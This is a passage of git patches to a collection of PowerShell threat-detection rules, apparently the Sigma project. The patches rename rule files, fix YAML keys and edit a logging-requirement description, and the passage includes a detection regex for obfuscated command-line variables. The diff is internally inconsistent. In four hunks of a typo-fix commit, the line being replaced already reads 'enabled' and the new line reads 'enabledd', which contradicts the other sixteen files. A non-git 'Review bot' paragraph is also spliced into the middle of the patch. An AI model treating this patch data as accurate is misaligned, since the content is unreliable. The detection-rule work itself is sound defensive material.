 rename rules/windows/powershell/{ => powershell_script}/powershell_wmi_persistence.yml (100%)
 rename rules/windows/powershell/{ => powershell_script}/powershell_wmimplant.yml (100%)
diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml
index 6f187cfb..e47caf11 100644
--- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml
+++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml
@@ -18,6 +18,7 @@ logsource:
 product: windows
 service: powershell
 definition: Module Logging must be enable
+detection:
 selection_4103:
 EventID: 4103
 Payload|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"'
diff --git a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml
index ab97eb0d..26753203 100644
--- a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml
+++ b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml
@@ -2,7 +2,7 @@ title: Zip A Folder With PowerShell For Staging In Temp
 id: daf7eb81-35fd-410d-9d7a-657837e602bb
 related:
 - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9
- related: derived
+ type: derived
 status: experimental
 author: frack113
 date: 2021/07/20
diff --git a/rules/windows/powershell/powershell_adrecon_execution.yml b/rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml
similarity index 100%
rename from rules/windows/powershell/powershell_adrecon_execution.yml
rename to rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml
diff --git a/rules/windows/powershell/powershell_automated_collection.yml b/rules/windows/powershell/powershell_script/powershell_automated_collection.yml
similarity index 100%
rename from rules/windows/powershell/powershell_automated_collection.yml
rename to rules/windows/powershell/powershell_script/powershell_automated_collection.yml
diff --git a/rules/windows/powershell/powershell_cl_invocation_lolscript.yml b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml
similarity index 100%
rename from rules/windows/powershell/powershell_cl_invocation_lolscript.yml
rename to rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml
diff --git a/rules/windows/powershell/powershell_cl_invocation_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml
similarity index 100%
rename from rules/windows/powershell/powershell_cl_invocation_lolscript_count.yml
rename to rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml
diff --git a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml
similarity index 100%
rename from rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml
rename to rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml
diff --git a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml
similarity index 100%
rename from rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_count.yml
rename to rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml
diff --git a/rules/windows/powershell/powershell_create_local_user.yml b/rules/windows/powershell/powershell_script/powershell_create_local_user.yml
similarity index 100%
rename from rules/windows/powershell/powershell_create_local_user.yml
rename to rules/windows/powershell/powershell_script/powershell_create_local_user.yml
diff --git a/rules/windows/powershell/powershell_data_compressed.yml b/rules/windows/powershell/powershell_script/powershell_data_compressed.yml
similarity index 100%
rename from rules/windows/powershell/powershell_data_compressed.yml
rename to rules/windows/powershell/powershell_script/powershell_data_compressed.yml
diff --git a/rules/windows/powershell/powershell_detect_vm_env.yml b/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml
similarity index 100%
rename from rules/windows/powershell/powershell_detect_vm_env.yml
rename to rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml
diff --git a/rules/windows/powershell/powershell_dnscat_execution.yml b/rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml
similarity index 100%
rename from rules/windows/powershell/powershell_dnscat_execution.yml
rename to rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml
diff --git a/rules/windows/powershell/powershell_icmp_exfiltration.yml b/rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml
similarity index 100%
rename from rules/windows/powershell/powershell_icmp_exfiltration.yml
rename to rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml
diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml
similarity index 100%
rename from rules/windows/powershell/powershell_invoke_nightmare.yml
rename to rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml
diff --git a/rules/windows/powershell/powershell_keylogging.yml b/rules/windows/powershell/powershell_script/powershell_keylogging.yml
similarity index 100%
rename from rules/windows/powershell/powershell_keylogging.yml
rename to rules/windows/powershell/powershell_script/powershell_keylogging.yml
diff --git a/rules/windows/powershell/powershell_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml
similarity index 100%
rename from rules/windows/powershell/powershell_malicious_commandlets.yml
rename to rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml
diff --git a/rules/windows/powershell/powershell_malicious_keywords.yml b/rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml
similarity index 100%
rename from rules/windows/powershell/powershell_malicious_keywords.yml
rename to rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml
diff --git a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml
similarity index 100%
rename from rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml
rename to rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml
diff --git a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml
similarity index 100%
rename from rules/windows/powershell/powershell_nishang_malicious_commandlets.yml
rename to rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml
diff --git a/rules/windows/powershell/powershell_ntfs_ads_access.yml b/rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml
similarity index 100%
rename from rules/windows/powershell/powershell_ntfs_ads_access.yml
rename to rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml
diff --git a/rules/windows/powershell/powershell_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml
similarity index 100%
rename from rules/windows/powershell/powershell_powerview_malicious_commandlets.yml
rename to rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml
diff --git a/rules/windows/powershell/powershell_prompt_credentials.yml b/rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml
similarity index 100%
rename from rules/windows/powershell/powershell_prompt_credentials.yml
rename to rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml
diff --git a/rules/windows/powershell/powershell_psattack.yml b/rules/windows/powershell/powershell_script/powershell_psattack.yml
similarity index 100%
rename from rules/windows/powershell/powershell_psattack.yml
rename to rules/windows/powershell/powershell_script/powershell_psattack.yml
diff --git a/rules/windows/powershell/powershell_shellcode_b64.yml b/rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml
similarity index 100%
rename from rules/windows/powershell/powershell_shellcode_b64.yml
rename to rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml
diff --git a/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml
similarity index 100%
rename from rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml
rename to rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml
diff --git a/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml b/rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml
similarity index 100%
rename from rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml
rename to rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml
diff --git a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml
similarity index 100%
rename from rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml
rename to rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml
diff --git a/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml
similarity index 100%
rename from rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml
rename to rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml
diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml
similarity index 100%
rename from rules/windows/powershell/powershell_suspicious_keywords.yml
rename to rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml
diff --git a/rules/windows/powershell/powershell_suspicious_mail_acces.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml
similarity index 100%
rename from rules/windows/powershell/powershell_suspicious_mail_acces.yml
rename to rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml
diff --git a/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml
similarity index 100%
rename from rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml
rename to rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml
diff --git a/rules/windows/powershell/powershell_suspicious_recon.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml
similarity index 100%
rename from rules/windows/powershell/powershell_suspicious_recon.yml
rename to rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml
diff --git a/rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml
similarity index 100%
rename from rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml
rename to rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml
diff --git a/rules/windows/powershell/powershell_timestomp.yml b/rules/windows/powershell/powershell_script/powershell_timestomp.yml
similarity index 100%
rename from rules/windows/powershell/powershell_timestomp.yml
rename to rules/windows/powershell/powershell_script/powershell_timestomp.yml
diff --git a/rules/windows/powershell/powershell_trigger_profiles.yml b/rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml
similarity index 100%
rename from rules/windows/powershell/powershell_trigger_profiles.yml
rename to rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml
diff --git a/rules/windows/powershell/powershell_web_request.yml b/rules/windows/powershell/powershell_script/powershell_web_request.yml
similarity index 100%
rename from rules/windows/powershell/powershell_web_request.yml
rename to rules/windows/powershell/powershell_script/powershell_web_request.yml
diff --git a/rules/windows/powershell/powershell_winlogon_helper_dll.yml b/rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml
similarity index 100%
rename from rules/windows/powershell/powershell_winlogon_helper_dll.yml
rename to rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml
diff --git a/rules/windows/powershell/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml
similarity index 100%
rename from rules/windows/powershell/powershell_wmi_persistence.yml
rename to rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml
diff --git a/rules/windows/powershell/powershell_wmimplant.yml b/rules/windows/powershell/powershell_script/powershell_wmimplant.yml
similarity index 100%
rename from rules/windows/powershell/powershell_wmimplant.yml
rename to rules/windows/powershell/powershell_script/powershell_wmimplant.yml
From f475b90ee336c9b8d3de5667dec3c3b4e42ce837 Mon Sep 17 00:00:00 2001
From: Florian Roth Date: Sat, 9 Oct 2021 16:41:48 +0200 Subject: [PATCH 1195/1367] fix: typo in description --- .../powershell_module/powershell_alternate_powershell_hosts.yml | 2 +- .../powershell_module/powershell_bad_opsec_artifacts.yml | 2 +- .../powershell_module/powershell_clear_powershell_history.yml | 2 +- .../powershell_module/powershell_decompress_commands.yml | 2 +- .../powershell/powershell_module/powershell_get_clipboard.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_clip.yml | 2 +- .../powershell_invoke_obfuscation_obfuscated_iex.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_stdin.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_var.yml | 2 +- .../powershell_invoke_obfuscation_via_compress.yml | 2 +- .../powershell_invoke_obfuscation_via_rundll.yml | 2 +- .../powershell_invoke_obfuscation_via_stdin.yml | 2 +- .../powershell_invoke_obfuscation_via_use_clip.yml | 2 +- .../powershell_invoke_obfuscation_via_use_mhsta.yml | 2 +- .../powershell_invoke_obfuscation_via_use_rundll32.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_via_var.yml | 2 +- .../powershell/powershell_module/powershell_powercat.yml | 2 +- .../powershell_module/powershell_remote_powershell_session.yml | 2 +- .../powershell_susp_athremotefxvgpudisablementcommand.yml | 2 +- .../powershell_module/powershell_susp_zip_compress.yml | 2 +- 20 files changed, 20 insertions(+), 20 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml index fb409b13..7ab2c944 100644 --- a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml 
@@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml index dcb92bd0..c5153e21 100644 --- a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml +++ b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml @@ -19,7 +19,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml index fb57e960..48f64acc 100644 --- a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml index e30c7fe3..d1c7e564 100644 --- a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml @@ -17,7 +17,7 @@ references: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection2: EventID: 4103 
diff --git a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml index 2902ece6..61e99ec3 100644 --- a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml @@ -17,7 +17,7 @@ references: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection2: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml index 604505ae..a825ff6d 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml index 2dcd9ad2..c94e328d 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_3: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml index d531c87e..ac820014 100644 
--- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml index e47caf11..3fb82c2e 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml index e4f1400c..9faa95df 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml index 82369978..bff58af6 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml 
@@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml index 65fff0f1..ef94a8c3 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml index 482721a0..6e5b5d32 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml index ab47039d..aecbcfcf 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml 
@@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: Module Logging must be enabledd detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml index deee26ed..e97a7449 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml index 06d3381a..4273a271 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: Module Logging must be enabledd detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_powercat.yml b/rules/windows/powershell/powershell_module/powershell_powercat.yml index f024c450..3feb349e 100644 --- a/rules/windows/powershell/powershell_module/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_module/powershell_powercat.yml @@ -15,7 +15,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection: EventID: 4103 
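Review bot: The replacement line in the powershell_invoke_obfuscation_via_use_mhsta.yml hunk introduces a typo instead of fixing one: the removed text already read `Module Logging must be enabled` and the added line is `definition: Module Logging must be enabledd`. The same doubled letter lands in the powershell_invoke_obfuscation_via_var.yml hunk on this line and in the powershell_susp_athremotefxvgpudisablementcommand.yml and powershell_susp_zip_compress.yml hunks that follow, and the next commit (PATCH 1196) carries it forward as `PowerShell Module Logging must be enabledd` in all four files. Each of those added lines should end in `enabled`, matching the other sixteen files in this commit.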
diff --git a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml index c7795387..39a6161c 100644 --- a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml index 214610d7..18f9e127 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: Module Logging must be enabledd detection: selection_id: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml index 26753203..761d66b5 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml @@ -16,7 +16,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: Module Logging must be enabledd detection: selection_4103: EventID: 4103 From 2379907f26168bfaf06ebdcd6a6111486685aefd Mon Sep 17 00:00:00 2001 
From: Florian Roth Date: Sat, 9 Oct 2021 16:42:42 +0200 Subject: [PATCH 1196/1367] docs: extended the description by a word --- .../powershell_module/powershell_alternate_powershell_hosts.yml | 2 +- .../powershell_module/powershell_bad_opsec_artifacts.yml | 2 +- .../powershell_module/powershell_clear_powershell_history.yml | 2 +- .../powershell_module/powershell_decompress_commands.yml | 2 +- .../powershell/powershell_module/powershell_get_clipboard.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_clip.yml | 2 +- .../powershell_invoke_obfuscation_obfuscated_iex.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_stdin.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_var.yml | 2 +- .../powershell_invoke_obfuscation_via_compress.yml | 2 +- .../powershell_invoke_obfuscation_via_rundll.yml | 2 +- .../powershell_invoke_obfuscation_via_stdin.yml | 2 +- .../powershell_invoke_obfuscation_via_use_clip.yml | 2 +- .../powershell_invoke_obfuscation_via_use_mhsta.yml | 2 +- .../powershell_invoke_obfuscation_via_use_rundll32.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_via_var.yml | 2 +- .../powershell/powershell_module/powershell_powercat.yml | 2 +- .../powershell_module/powershell_remote_powershell_session.yml | 2 +- .../powershell_susp_athremotefxvgpudisablementcommand.yml | 2 +- .../powershell_module/powershell_susp_zip_compress.yml | 2 +- 20 files changed, 20 insertions(+), 20 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml index 7ab2c944..0a5dc88c 100644 --- a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml 
@@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml index c5153e21..dc3a6cdd 100644 --- a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml +++ b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml @@ -19,7 +19,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml index 48f64acc..63ab1d2d 100644 --- a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml index d1c7e564..675257bd 100644 --- a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml @@ -17,7 +17,7 @@ references: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection2: EventID: 4103 
diff --git a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml index 61e99ec3..58e7ce4f 100644 --- a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml @@ -17,7 +17,7 @@ references: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection2: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml index a825ff6d..98a298b6 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml index c94e328d..fe77d74d 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_3: EventID: 4103 
diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml index ac820014..ff0cda53 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml index 3fb82c2e..f85198cc 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: PowerShell Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git 